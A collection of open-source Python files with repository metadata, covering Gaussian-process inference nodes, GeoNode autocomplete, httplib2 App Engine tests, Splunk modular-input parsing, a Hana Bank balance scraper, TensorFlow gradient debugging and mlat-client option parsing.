logdet_chol(U),
np.size(self.f))
for (dmu, func) in dmus:
# Derivative w.r.t. mean vector
d = -np.sum(z)
# Send the derivative message
func += d
#func(d)
for (dK, func) in dKs:
# Compute derivative w.r.t. covariance matrix
d = 0.5 * (np.dot(z, np.dot(dK, z))
- np.trace(chol_solve(U, dK)))
# Send the derivative message
#print('add gradient')
#func += d
func(d)
else:
raise Exception('Not implemented yet')
return L
## Let f1 be observed and f2 latent function values.
# Compute <log p(f1,f2|m,k)>
#L = gaussian_logpdf(sum_product(np.outer(self.f,self.f) + self.Cov,
# Compute <log q(f2)>
def update(self):
# Messages from parents
m = self.parents[0].message_to_child()
k = self.parents[1].message_to_child()
## m = self.parents[0].message_to_child()[0]
## k = self.parents[1].message_to_child()[0]
if self.observed:
# Observations of this node
self.u = gp_posterior_moment_function(m, k, self.x, self.f)
else:
x = np.array([])
y = np.array([])
# V accumulates the children's covariance blocks; the original code
# referenced it before assignment, so start from an empty block.
V = np.zeros((0, 0))
# Messages from children
for (child,index) in self.children:
(msg, mask) = child.message_to_parent(index)
# Ignoring masks and plates..
# m[0] is the inputs
x = np.concatenate((x, msg[0]), axis=-2)
# m[1] is the observations
y = np.concatenate((y, msg[1]))
# m[2] is the covariance matrix
V = linalg.block_diag(V, msg[2])
self.u = gp_posterior_moment_function(m, k, x, y, covariance=V)
self.x = x
self.f = y
class NodeGaussianProcess(Stochastic):
#class NodeGaussianProcess(NodeVariable):
def __init__(self, m, k, **kwargs):
self.x = np.array([])
self.f = np.array([])
## self.x_obs = np.zeros((0,1))
## self.f_obs = np.zeros((0,))
# By default, posterior == prior
self.m = m
self.k = k
# Ignore plates
NodeVariable.__init__(self,
m,
k,
plates=(),
dims=[(np.inf,), (np.inf,np.inf)],
**kwargs)
def message_to_parent(self, index):
if index == 0:
k = self.parents[1].message_to_child()[0]
K = k(self.x, self.x)
return [self.x,
self.mu,
K]
if index == 1:
raise Exception("not implemented yet")
def message_to_child(self):
if self.observed:
raise Exception("Observable GP should not have children.")
return self.u
def get_parameters(self):
return self.u
def observe(self, x, f):
if np.ndim(x) == 1:
if np.shape(f) != np.shape(x):
print(np.shape(f))
print(np.shape(x))
raise Exception("Number of inputs and function values do not match")
elif np.shape(f) != np.shape(x)[:-1]:
print(np.shape(f))
print(np.shape(x))
raise Exception("Number of inputs and function values do not match")
self.observed = True
self.x = x
self.f = f
## self.x_obs = x
## self.f_obs = f
# You might want:
# - mean for x
# - covariance (and mean) for x
# - variance (and mean) for x
# - i.e., mean and/or (co)variance for x
# - covariance for x1 and x2
def lower_bound_contribution(self, gradient=False):
m = self.parents[0].message_to_child(gradient=gradient)
k = self.parents[1].message_to_child(gradient=gradient)
## m = self.parents[0].message_to_child(gradient=gradient)[0]
## k = self.parents[1].message_to_child(gradient=gradient)[0]
# Prior
if gradient:
(mu, dmus) = m(self.x, gradient=True)
(K, dKs) = k(self.x, self.x, gradient=True)
else:
mu = m(self.x)
K = k(self.x, self.x)
dmus = []
dKs = []
mu = mu[0]
K = K[0]
# Log pdf
if self.observed:
f0 = self.f - mu
#print('hereiam')
#print(K)
try:
U = chol(K)
except linalg.LinAlgError:
print('non positive definite, return -inf')
return -np.inf
z = chol_solve(U, f0)
#print(K)
L = gaussian_logpdf(np.dot(f0, z),
0,
0,
logdet_chol(U),
np.size(self.f))
for (dmu, func) in dmus:
# Derivative w.r.t. mean vector
d = -np.sum(z)
# Send the derivative message
func += d
#func(d)
for (dK, func) in dKs:
# Compute derivative w.r.t. covariance matrix
d = 0.5 * (np.dot(z, np.dot(dK, z))
- np.trace(chol_solve(U, dK)))
# Send the derivative message
#print('add gradient')
#func += d
func(d)
else:
raise Exception('Not implemented yet')
return L
## Let f1 be observed and f2 latent function values.
# Compute <log p(f1,f2|m,k)>
#L = gaussian_logpdf(sum_product(np.outer(self.f,self.f) + self.Cov,
# Compute <log q(f2)>
def update(self):
# Messages from parents
m = self.parents[0].message_to_child()
k = self.parents[1].message_to_child()
## m = self.parents[0].message_to_child()[0]
## k = self.parents[1].message_to_child()[0]
if self.observed:
# Observations of this node
self.u = gp_posterior_moment_function(m, k, self.x, self.f)
else:
x = np.array([])
y = np.array([])
# V accumulates the children's covariance blocks; the original code
# referenced it before assignment, so start from an empty block.
V = np.zeros((0, 0))
# Messages from children
for (child,index) in self.children:
(msg, mask) = child.message_to_parent(index)
# Ignoring masks and plates..
# m[0] is the inputs
x = np.concatenate((x, msg[0]), axis=-2)
# m[1] is the observations
y = np.concatenate((y, msg[1]))
# m[2] is the covariance matrix
V = linalg.block_diag(V, msg[2])
self.u = gp_posterior_moment_function(m, k, x, y, covariance=V)
self.x = x
self.f = y
| mit | -8,059,095,777,191,274,000 | 27.401212 | 95 | 0.466092 | false |
travislbrundage/geonode | geonode/people/autocomplete_light_registry.py | 11 | 1333 | # -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2016 OSGeo
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#########################################################################
import autocomplete_light
from .models import Profile
class ProfileAutocomplete(autocomplete_light.AutocompleteModelTemplate):
choice_template = 'autocomplete_response.html'
def choices_for_request(self):
self.choices = self.choices.exclude(username='AnonymousUser')
return super(ProfileAutocomplete, self).choices_for_request()
autocomplete_light.register(
Profile,
ProfileAutocomplete,
search_fields=['first_name', 'last_name', 'email', 'username'],
)
| gpl-3.0 | 3,028,582,444,827,986,400 | 35.027027 | 73 | 0.662416 | false |
smurfix/httplib2 | python2/httplib2test_appengine.py | 7 | 2188 | """Tests for httplib2 on Google App Engine."""
import mock
import os
import sys
import unittest
APP_ENGINE_PATH='/usr/local/google_appengine'
sys.path.insert(0, APP_ENGINE_PATH)
import dev_appserver
dev_appserver.fix_sys_path()
from google.appengine.ext import testbed
# Ensure that we are not loading the httplib2 version included in the Google
# App Engine SDK.
sys.path.insert(0, os.path.dirname(os.path.realpath(__file__)))
class AberrationsTest(unittest.TestCase):
def setUp(self):
self.testbed = testbed.Testbed()
self.testbed.activate()
self.testbed.init_urlfetch_stub()
def tearDown(self):
self.testbed.deactivate()
@mock.patch.dict('os.environ', {'SERVER_SOFTWARE': ''})
def testConnectionInit(self):
global httplib2
import httplib2
self.assertNotEqual(
httplib2.SCHEME_TO_CONNECTION['https'], httplib2.AppEngineHttpsConnection)
self.assertNotEqual(
httplib2.SCHEME_TO_CONNECTION['http'], httplib2.AppEngineHttpConnection)
del globals()['httplib2']
class AppEngineHttpTest(unittest.TestCase):
def setUp(self):
self.testbed = testbed.Testbed()
self.testbed.activate()
self.testbed.init_urlfetch_stub()
global httplib2
import httplib2
reload(httplib2)
def tearDown(self):
self.testbed.deactivate()
del globals()['httplib2']
def testConnectionInit(self):
self.assertEqual(
httplib2.SCHEME_TO_CONNECTION['https'], httplib2.AppEngineHttpsConnection)
self.assertEqual(
httplib2.SCHEME_TO_CONNECTION['http'], httplib2.AppEngineHttpConnection)
def testGet(self):
http = httplib2.Http()
response, content = http.request("http://www.google.com")
self.assertEqual(httplib2.SCHEME_TO_CONNECTION['https'],
httplib2.AppEngineHttpsConnection)
self.assertEquals(1, len(http.connections))
self.assertEquals(response.status, 200)
self.assertEquals(response['status'], '200')
def testProxyInfoIgnored(self):
http = httplib2.Http(proxy_info=mock.MagicMock())
response, content = http.request("http://www.google.com")
self.assertEquals(response.status, 200)
if __name__ == '__main__':
unittest.main()
| mit | -5,151,024,276,451,210,000 | 26.696203 | 80 | 0.713894 | false |
chenziliang/google | Splunk_TA_google/bin/splunktalib/modinput.py | 1 | 4669 | import sys
import subprocess
import traceback
from splunktalib.common import log
import splunktalib.splunk_platform as sp
logger = log.Logs().get_logger("util")
def _parse_modinput_configs(root, outer_block, inner_block):
"""
When splunkd spawns the modinput script to do a config check or to run it,
splunkd feeds the script an XML configuration like the following:
<?xml version="1.0" encoding="UTF-8"?>
<input>
<server_host>localhost.localdomain</server_host>
<server_uri>https://127.0.0.1:8089</server_uri>
<session_key>xxxyyyzzz</session_key>
<checkpoint_dir>ckpt_dir</checkpoint_dir>
<configuration>
<stanza name="snow://alm_asset">
<param name="duration">60</param>
<param name="host">localhost.localdomain</param>
<param name="index">snow</param>
<param name="priority">10</param>
</stanza>
...
</configuration>
</input>
When a user creates a stanza through a data input on the WebUI, the XML
takes the following form instead:
<?xml version="1.0" encoding="UTF-8"?>
<items>
<server_host>localhost.localdomain</server_host>
<server_uri>https://127.0.0.1:8089</server_uri>
<session_key>xxxyyyzzz</session_key>
<checkpoint_dir>ckpt_dir</checkpoint_dir>
<item name="abc">
<param name="duration">60</param>
<param name="exclude"></param>
<param name="host">localhost.localdomain</param>
<param name="index">snow</param>
<param name="priority">10</param>
</item>
</items>
"""
confs = root.getElementsByTagName(outer_block)
if not confs:
logger.error("Invalid config, missing %s section", outer_block)
raise Exception("Invalid config, missing %s section".format(
outer_block
))
configs = []
stanzas = confs[0].getElementsByTagName(inner_block)
for stanza in stanzas:
config = {}
stanza_name = stanza.getAttribute("name")
if not stanza_name:
logger.error("Invalid config, missing name")
raise Exception("Invalid config, missing name")
config["name"] = stanza_name
params = stanza.getElementsByTagName("param")
for param in params:
name = param.getAttribute("name")
if (name and param.firstChild and
param.firstChild.nodeType == param.firstChild.TEXT_NODE):
config[name] = param.firstChild.data
configs.append(config)
return configs
def parse_modinput_configs(config_str):
"""
@config_str: modinput XML configuration feed by splunkd
@return: meta_config and stanza_config
"""
import xml.dom.minidom as xdm
meta_configs = {
"server_host": None,
"server_uri": None,
"session_key": None,
"checkpoint_dir": None,
}
root = xdm.parseString(config_str)
doc = root.documentElement
for tag in meta_configs.iterkeys():
nodes = doc.getElementsByTagName(tag)
if not nodes:
logger.error("Invalid config, missing %s section", tag)
raise Exception("Invalid config, missing %s section", tag)
if (nodes[0].firstChild and
nodes[0].firstChild.nodeType == nodes[0].TEXT_NODE):
meta_configs[tag] = nodes[0].firstChild.data
else:
logger.error("Invalid config, expect text ndoe")
raise Exception("Invalid config, expect text ndoe")
if doc.nodeName == "input":
configs = _parse_modinput_configs(doc, "configuration", "stanza")
else:
configs = _parse_modinput_configs(root, "items", "item")
return meta_configs, configs
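# Sketch of the expected output for the <input> XML shown in the docstring
# above (values are the ones from that example):
#
#     meta, stanzas = parse_modinput_configs(config_str)
#     meta["session_key"]     -> "xxxyyyzzz"
#     stanzas[0]["name"]      -> "snow://alm_asset"
#     stanzas[0]["duration"]  -> "60"   (all param values come back as strings)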
def get_modinput_configs_from_cli(modinput, modinput_stanza=None):
"""
@modinput: modinput name
@modinput_stanza: modinput stanza name, for multiple instance only
"""
assert modinput
splunkbin = sp.get_splunk_bin()
cli = [splunkbin, "cmd", "splunkd", "print-modinput-config", modinput]
if modinput_stanza:
cli.append(modinput_stanza)
out, err = subprocess.Popen(cli, stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
if err:
logger.error("Failed to get modinput configs with error: %s", err)
return None, None
else:
return parse_modinput_configs(out)
def get_modinput_config_str_from_stdin():
"""
Get modinput from stdin which is feed by splunkd
"""
try:
return sys.stdin.read()
except Exception:
logger.error(traceback.format_exc())
raise
def get_modinput_configs_from_stdin():
config_str = get_modinput_config_str_from_stdin()
return parse_modinput_configs(config_str)
| mit | -5,073,781,968,028,439,000 | 30.126667 | 77 | 0.620904 | false |
ssut/PushBank | adapters/hana.py | 1 | 2918 | # -*- coding: utf-8 -*-
import json
import urllib
import urllib2
from bs4 import BeautifulSoup
from datetime import datetime, timedelta
en_name = 'hana'
name = u'하나은행'
def query(account, password, resident):
"""
Quick balance inquiry for a Hana Bank account. The account must be enrolled
in the quick-inquiry service before this can be used.
Quick-inquiry service:
https://open.hanabank.com/flex/quick/quickService.do?oid=quickservice
account -- account number (digits only, no '-')
password -- account password (4 digits)
resident -- first 6 digits of the resident registration number
"""
if len(password) != 4 or not password.isdigit():
raise ValueError("password: 비밀번호는 숫자 4자리여야 합니다.")
if len(resident) != 6 or not resident.isdigit():
raise ValueError("resident: 주민등록번호 앞 6자리를 입력해주세요.")
url = 'https://open.hanabank.com/quick_service/inquiryAcct02_01.do'
params = {
'ajax': 'true',
'acctNo': account,
'acctPw': password,
'bkfgResRegNo': resident,
'curCd': '',
'inqStrDt': (datetime.now() - timedelta(days=7)).strftime('%Y%m%d'),
'inqEndDt': datetime.now().strftime('%Y%m%d'),
'rvSeqInqYn': 'Y',
'rcvWdrwDvCd': '',
'rqstNcnt': '30',
'maxRowCount': '700',
'rqstPage': '1',
'acctType': '01',
'language': 'KOR'
}
try:
data = urllib.urlencode(params)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req, timeout=10)
data = response.read()
data = data.decode('euc-kr').encode('utf-8')
success = True
except Exception, e:
if e.getcode() == 500:
success = False
data = e.read()
d = {
'success': success,
'account': account,
}
if success:
data = data.replace(' ', '')
data = BeautifulSoup(data)
balance = data.select('table.tbl_col01' +
' tr:nth-of-type(2) td')[0].text.strip()
balance = int(balance.replace(',', ''))
history = [
[y.text.strip() for y in x.select('td')]
for x in data.select('table.tbl_col01')[1].select('tbody tr')
]
'''
Column order:
transaction date, type, description, deposit amount, withdrawal amount, balance, transaction time, branch
'''
d['balance'] = balance
d['history'] = [{
'date': datetime.strptime('{0},{1}'.format(x[0], x[6]),
'%Y-%m-%d,%H:%M').date(),
'type': x[1],
'depositor': x[2],
'withdraw': int(x[3].replace(',', '') if x[3] else '0'),
'pay': int(x[4].replace(',', '') if x[4] else '0'),
'balance': int(x[5].replace(',', '')),
'distributor': x[7],
} for x in history]
return d
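# Illustrative usage with made-up credentials (real values depend on the
# account registered for the quick-inquiry service):
#
#     result = query("12345678901234", "0000", "900101")
#     if result['success']:
#         print(result['balance'], len(result['history']))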
| mit | 6,866,556,140,860,453,000 | 28.711111 | 76 | 0.504862 | false |
horance-liu/tensorflow | tensorflow/python/debug/lib/debug_gradients.py | 25 | 15201 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorFlow Debugger: Tools for debugging gradients."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
import uuid
import six
from tensorflow.python.debug.lib import debug_data
from tensorflow.python.debug.lib import debug_graphs
from tensorflow.python.framework import ops
from tensorflow.python.ops import gen_array_ops
from tensorflow.python.ops import variables
_GRADIENT_DEBUG_TAG = "gradient_debug_"
_gradient_debuggers = {}
def _tensor_to_grad_debug_op_name(tensor, grad_debugger_uuid):
op_name, slot = debug_graphs.parse_node_or_tensor_name(tensor.name)
return "%s_%d/%s%s" % (op_name, slot, _GRADIENT_DEBUG_TAG, grad_debugger_uuid)
def _parse_grad_debug_op_name(op_name):
"""Parse the name of a debug gradient op.
Args:
op_name: the name of the debug gradient op.
Returns:
1) The UUID of the GradientsDebugger that created the debug gradient op.
2) Name of the original tensor whose gradient is debugged by the debug
gradient op.
"""
name_items = op_name.split("/")
assert len(name_items) > 1
assert name_items[-1].startswith(_GRADIENT_DEBUG_TAG)
grad_debugger_uuid = name_items[-1][len(_GRADIENT_DEBUG_TAG):]
if "_" in grad_debugger_uuid:
grad_debugger_uuid = grad_debugger_uuid[:grad_debugger_uuid.index("_")]
orig_tensor_slot = int(name_items[-2][name_items[-2].rfind("_") + 1:])
orig_base_op_name = name_items[-2][:name_items[-2].rfind("_")]
orig_tensor_name = ("/".join(name_items[:-2] + [orig_base_op_name]) +
":%d" % orig_tensor_slot)
return grad_debugger_uuid, orig_tensor_name
class GradientsDebugger(object):
"""Gradients Debugger.
Allows retrieval of gradient tensors created by TensorFlow's automatic
differentiation algorithm, i.e., @{tf.gradients} and optimizer classes that
use it.
"""
# TODO(cais): Add examples code in the doc string?
def __init__(self, y_tensor=None):
"""Constructor of GradientsDebugger.
Args:
y_tensor: optional: the `tf.Tensor` to be differentiated, i.e., the tensor
on the numerator of the differentiation.
"""
self._uuid = uuid.uuid4().hex
_gradient_debuggers[self._uuid] = self
# A dict mapping x-tensor names to gradient tensor. x-tensor refers to the
# independent tf.Tensor, i.e., the tensor on the denominator of the
# differentiation.
self._gradient_tensors = {}
self._y_tensor = y_tensor
self._graph = None
if y_tensor:
self._graph = y_tensor.graph
self._is_active_context = False
@property
def y_tensor(self):
return self._y_tensor
@property
def graph(self):
return self._graph
def __enter__(self):
self._is_active_context = True
def __exit__(self, unused_type, unused_value, unused_traceback):
self._is_active_context = False
def identify_gradient(self, input_tensor):
"""Create a debug identity tensor that registers and forwards gradients.
The side effect of this method is that when gradient tensor(s) are created
with respect to any path that includes the `input_tensor`, the gradient
tensor(s) with respect to `input_tensor` will be registered with this
`GradientsDebugger` instance and can later be retrieved with the
methods `gradient_tensor` and `gradient_tensors`.
Example:
```python
x = tf.Variable(1.0)
y = tf.add(x, x)
grad_debugger = tf_debug.GradientsDebugger()
debug_y = grad_debugger.identify_gradient(y)
z = tf.square(debug_y)
# Create a train op under the grad_debugger context.
with grad_debugger:
train_op = tf.train.GradientDescentOptimizer(0.1).minimize(z)
# Now we can reflect through grad_debugger to get the gradient tensor
# with respect to y.
y_grad = grad_debugger.gradient_tensor(y)
```
Args:
input_tensor: the input `tf.Tensor` object whose related gradient tensors
are to be registered with this `GradientsDebugger` instance when they
are created, e.g., during @{tf.gradients} calls or the construction
of an optimization (training) op that uses @{tf.gradients}.
Returns:
A forwarded identity of `input_tensor`, as a `tf.Tensor`.
Raises:
ValueError: If an op with name that duplicates the gradient-debugging op
already exists in the graph (highly unlikely).
"""
# TODO(cais): Allow overriding gradient.
# TODO(cais): Implement value_stack.
grad_debug_op_name = _tensor_to_grad_debug_op_name(input_tensor, self._uuid)
# pylint: disable=protected-access
debug_grad_identity = gen_array_ops._debug_gradient_identity(
input_tensor, name=grad_debug_op_name)
# pylint: enable=protected-access
if debug_grad_identity.op.name != grad_debug_op_name:
raise ValueError(
"The graph already contains an op named %s" % grad_debug_op_name)
return debug_grad_identity
def watch_gradients_by_tensors(self, graph, tensors):
"""Watch gradient tensors by x-tensor(s).
The side effect of this method is that when gradient tensor(s) are created
with respect to any path that includes the `x_tensor`s, the gradient
tensor(s) with respect to those tensors will be registered with this
`GradientsDebugger` instance and can later be retrieved with the
methods `gradient_tensor` and `gradient_tensors`.
Unlike the method `identify_gradient`, this method is used to retrieve
gradient tensors after the construction of the forward subgraph has
completed (but before the construction of the backward subgraph).
This method is the same as `watch_gradients_by_tensor_names` except that
the tensors are specified by the Python `tf.Tensor` or `tf.Variable`
objects, instead of by name patterns.
Example:
```python
x = tf.Variable(1.0)
y = tf.add(x, x, name="y")
z = tf.square(y)
# Create a train op under the grad_debugger context.
grad_debugger = tf_debug.GradientsDebugger()
with grad_debugger.watch_gradients_by_tensors(y):
train_op = tf.train.GradientDescentOptimizer(0.1).minimize(z)
# Now we can reflect through grad_debugger to get the gradient tensor
# with respect to y.
y_grad = grad_debugger.gradient_tensor(y)
# or
y_grad = grad_debugger.gradient_tensor("y:0")
```
Args:
graph: the `tf.Graph` to watch the gradients on.
tensors: a `tf.Tensor` or `tf.Variable` object, or a list of such objects.
Returns:
The GradientsDebugger instance itself.
"""
if not isinstance(tensors, list):
tensors = [tensors]
tensor_name_regex = []
for tensor in tensors:
tensor_name_regex.append(re.escape(tensor.name) + "$")
tensor_name_regex = "(" + "|".join(tensor_name_regex) + ")"
return self.watch_gradients_by_tensor_names(graph, tensor_name_regex)
def watch_gradients_by_tensor_names(self, graph, tensor_name_regex):
"""Watch gradient tensors by name(s) of the x-tensor(s).
The side effect of this method is that when gradient tensor(s) are created
with respect to the x-tensors, the gradient tensor(s) will be registered
with this `GradientsDebugger` instance and can later be retrieved.
Unlike the `identify_gradient` method, this method is used after the
construction of the forward graph has completed. Unlike the
`watch_gradients_by_tensors` method, this method does not use handles to the
tensors of interest; it uses their names.
This method is the same as `watch_gradients_by_tensors` except that the
x-tensors are specified by name patterns, instead of `tf.Tensor` or
`tf.Variable` objects.
Example:
```python
x = tf.Variable(1.0, name="x")
y = tf.add(x, x, name="y")
z = tf.square(y)
# Create a train op under the grad_debugger context.
grad_debugger = tf_debug.GradientsDebugger()
with grad_debugger.watch_gradients_by_tensor_names(r"(x|y):0$"):
train_op = tf.train.GradientDescentOptimizer(0.1).minimize(z)
# Now we can reflect through grad_debugger to get the gradient tensor
# with respect to x and y.
x_grad = grad_debugger.gradient_tensor("x:0")
y_grad = grad_debugger.gradient_tensor("y:0")
```
Args:
graph: the `tf.Graph` to watch the gradients on.
tensor_name_regex: the regular-expression pattern of the name(s) of the
x-tensor(s) to watch. x-tensor refers to the tensors on the denominator
of the differentiation.
Returns:
The GradientsDebugger instance itself.
"""
tensor_name_pattern = re.compile(tensor_name_regex)
# pylint: disable=protected-access
with graph.as_default():
for op in graph.get_operations():
for output in op.outputs:
if tensor_name_pattern.match(output.name):
debug_op = self.identify_gradient(output)
for consumer in output.consumers():
if consumer == debug_op.op:
continue
# Locate the slot index of the original input.
input_slots = []
for i, consumer_input in enumerate(consumer._inputs):
if consumer_input == output:
input_slots.append(i)
for slot in input_slots:
consumer._inputs[slot] = debug_op
debug_op._consumers.append(consumer)
del output._consumers[:]
output._consumers.append(debug_op.op)
# pylint: enable=protected-access
return self
def _check_same_graph(self, tensor):
if self._graph is None:
self._graph = tensor.graph
elif self._graph != tensor.graph:
raise ValueError(
"The graph of the value (%s) is not the same as the graph %s" %
(tensor.graph, self._graph))
def register_gradient_tensor(self,
x_tensor_name,
gradient_tensor):
"""Register the gradient tensor for an x-tensor.
Args:
x_tensor_name: (`str`) the name of the independent `tf.Tensor`, i.e.,
the tensor on the denominator of the differentiation.
gradient_tensor: the gradient `tf.Tensor`.
"""
if len(_gradient_debuggers) == 1 or self._is_active_context:
self._check_same_graph(gradient_tensor)
self._gradient_tensors[x_tensor_name] = gradient_tensor
def gradient_tensor(self, x_tensor):
"""Get the gradient tensor of an x-tensor.
Args:
x_tensor: (`tf.Tensor`, `tf.Variable` or `str`) The x-tensor object or its
name. x-tensor refers to the independent `tf.Tensor`, i.e., the tensor
on the denominator of the differentiation.
Returns:
If found, the gradient tensor.
Raises:
TypeError: If `x_tensor` is not a `tf.Tensor`, `tf.Variable` or `str`.
LookupError: If the `x_tensor` has not been registered with a gradient
tensor.
"""
x_tensor_name = self._get_tensor_name(x_tensor)
if x_tensor_name not in self._gradient_tensors:
raise LookupError(
"This GradientsDebugger has not received any gradient tensor for "
"x-tensor %s" % x_tensor_name)
return self._gradient_tensors[x_tensor_name]
def gradient_tensors(self):
"""Get the gradient tensors that this object is aware of.
Returns:
A dict mapping x-tensor names to gradient tensor objects. x-tensor refers
to the tensors on the denominator of the differentiation.
"""
return self._gradient_tensors
def _get_tensor_name(self, tensor):
if isinstance(tensor, (ops.Tensor, variables.Variable)):
return tensor.name
elif isinstance(tensor, six.string_types):
return tensor
else:
raise TypeError(
"x_tensor must be a str or tf.Tensor or tf.Variable, "
"but instead has type %s" % type(tensor))
def clear_gradient_debuggers():
"""Clear all globally registered gradient debuggers."""
_gradient_debuggers.clear()
@ops.RegisterGradient("DebugGradientIdentity")
def _identify_gradient_grad(op, dy):
"""Gradient function for the DebugIdentity op."""
# TODO(cais): Allow overriding gradient.
grad_debugger_uuid, orig_tensor_name = _parse_grad_debug_op_name(op.name)
grad_debugger = _gradient_debuggers[grad_debugger_uuid]
grad_debugger.register_gradient_tensor(orig_tensor_name, dy)
return dy
def gradient_values_from_dump(grad_debugger, x_tensor, dump):
"""Find gradient values from a `DebugDumpDir` object.
Args:
grad_debugger: the `tf_debug.GradientsDebugger` instance to be used.
x_tensor: (`tf.Tensor`, `tf.Variable` or `str`) The x-tensor object or its
name. x-tensor refers to the independent `tf.Tensor`, i.e., the tensor
on the denominator of the differentiation.
dump: A `tfdbg.DebugDumpDir` object.
Returns:
If this `GradientsDebugger` instance has the gradient tensor of `x_tensor`
registered: a list of `numpy.ndarray` representing the value of the
gradient tensor from `dump`. The list could be empty, if the gradient
tensor is not executed in the `tf.Session.run()` call that generated
the `dump`. The list could also contain multiple values of the gradient
tensor, e.g., if gradient tensor is computed repeatedly in a
`tf.while_loop` during the run that generated the `dump`.
Raises:
LookupError: If this `GradientsDebugger` instance does not have the
gradient tensor of `x_tensor` registered.
ValueError: If this `GradientsDebugger` has a `tf.Graph` object that
does not match the `tf.Graph` object of the `dump`.
TypeError: If `x_tensor` is not a `tf.Tensor`, `tf.Variable` or `str`.
"""
# TODO(cais): Use this method in LocalCLIDebugWrapperSession to present the
# gradient tensors to the TFDBG CLI.
# If possible, verify that the Python graph of the dump and that of this
# GradientsDebugger match.
if (dump.python_graph and grad_debugger.graph and
dump.python_graph != grad_debugger.graph):
raise ValueError(
"This GradientsDebugger instance has a graph (%s) that differs from "
"the graph of the DebugDumpDir object (%s)." %
(grad_debugger.graph, dump.python_graph))
gradient_tensor = grad_debugger.gradient_tensor(x_tensor)
node_name, output_slot = debug_graphs.parse_node_or_tensor_name(
gradient_tensor.name)
try:
return dump.get_tensors(node_name, output_slot, "DebugIdentity")
except debug_data.WatchKeyDoesNotExistInDebugDumpDirError:
return []
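# Illustrative flow (names and paths are hypothetical; assumes a tfdbg dump
# was already collected for a graph watched by this GradientsDebugger):
#
#     grad_debugger = GradientsDebugger()
#     ... build the graph, watch gradients, run the wrapped session ...
#     dump = debug_data.DebugDumpDir("/tmp/tfdbg_dump/run-0000")
#     grad_vals = gradient_values_from_dump(grad_debugger, "y:0", dump)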
| apache-2.0 | -7,737,249,932,943,252,000 | 35.453237 | 80 | 0.676469 | false |
mutability/mlat-client | mlat/client/options.py | 1 | 6636 | #!/usr/bin/env python3
# -*- mode: python; indent-tabs-mode: nil -*-
# Part of mlat-client - an ADS-B multilateration client.
# Copyright 2015, Oliver Jowett <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import argparse
import functools
import _modes
from mlat.client.receiver import ReceiverConnection
from mlat.client.output import OutputListener, OutputConnector
from mlat.client.output import BasestationConnection, ExtBasestationConnection, BeastConnection
from mlat.client.util import log
_receiver_types = {
# input type -> decoder mode, server clock type
# the server clock type is used by the server to set
# the clock jitter etc; clock frequency and
# epoch are provided by the client.
'auto': (None, 'unknown'),
'dump1090': (_modes.BEAST, 'dump1090'),
'beast': (_modes.BEAST, 'beast'),
'radarcape_12mhz': (_modes.BEAST, 'radarcape_12mhz'), # compat
'radarcape_gps': (_modes.RADARCAPE, 'radarcape_gps'), # compat
'radarcape': (_modes.BEAST, 'radarcape'), # autodetects gps if present
'sbs': (_modes.SBS, 'sbs'),
'avrmlat': (_modes.AVRMLAT, 'unknown'),
}
def latitude(s):
lat = float(s)
if lat < -90 or lat > 90:
raise argparse.ArgumentTypeError('Latitude %s must be in the range -90 to 90' % s)
return lat
def longitude(s):
lon = float(s)
if lon < -180 or lon > 360:
raise argparse.ArgumentTypeError('Longitude %s must be in the range -180 to 360' % s)
if lon > 180:
lon -= 360
return lon
def altitude(s):
if s.endswith('m'):
alt = float(s[:-1])
elif s.endswith('ft'):
alt = float(s[:-2]) * 0.3048
else:
alt = float(s)
# Wikipedia to the rescue!
# "The lowest point on dry land is the shore of the Dead Sea [...]
# 418m below sea level". Perhaps not the best spot for a receiver?
# La Rinconada, Peru, pop. 30,000, is at 5100m.
if alt < -420 or alt > 5100:
raise argparse.ArgumentTypeError('Altitude %s must be in the range -420m to 5100m' % s)
return alt
def port(s):
port = int(s)
if port < 1 or port > 65535:
raise argparse.ArgumentTypeError('Port %s must be in the range 1 to 65535' % s)
return port
def hostport(s):
parts = s.split(':')
if len(parts) != 2:
raise argparse.ArgumentTypeError("{} should be in 'host:port' format".format(s))
return (parts[0], int(parts[1]))
def make_inputs_group(parser):
inputs = parser.add_argument_group('Mode S receiver input connection')
inputs.add_argument('--input-type',
help="Sets the input receiver type.",
choices=_receiver_types.keys(),
default='dump1090')
inputs.add_argument('--input-connect',
help="host:port to connect to for Mode S traffic. Required.",
required=True,
type=hostport,
default=('localhost', 30005))
def clock_frequency(args):
return _modes.Reader(_receiver_types[args.input_type][0]).frequency
def clock_epoch(args):
return _modes.Reader(_receiver_types[args.input_type][0]).epoch
def clock_type(args):
return _receiver_types[args.input_type][1]
def connection_mode(args):
return _receiver_types[args.input_type][0]
def make_results_group(parser):
results = parser.add_argument_group('Results output')
results.add_argument('--results',
help="""
<protocol>,connect,host:port or <protocol>,listen,port.
Protocol may be 'basestation', 'ext_basestation', or 'beast'. Can be specified multiple times.""",
action='append',
default=[])
results.add_argument("--no-anon-results",
help="Do not generate results for anonymized aircraft",
action='store_false',
dest='allow_anon_results',
default=True)
results.add_argument("--no-modeac-results",
help="Do not generate results for Mode A/C tracks",
action='store_false',
dest='allow_modeac_results',
default=True)
return results
def output_factory(s):
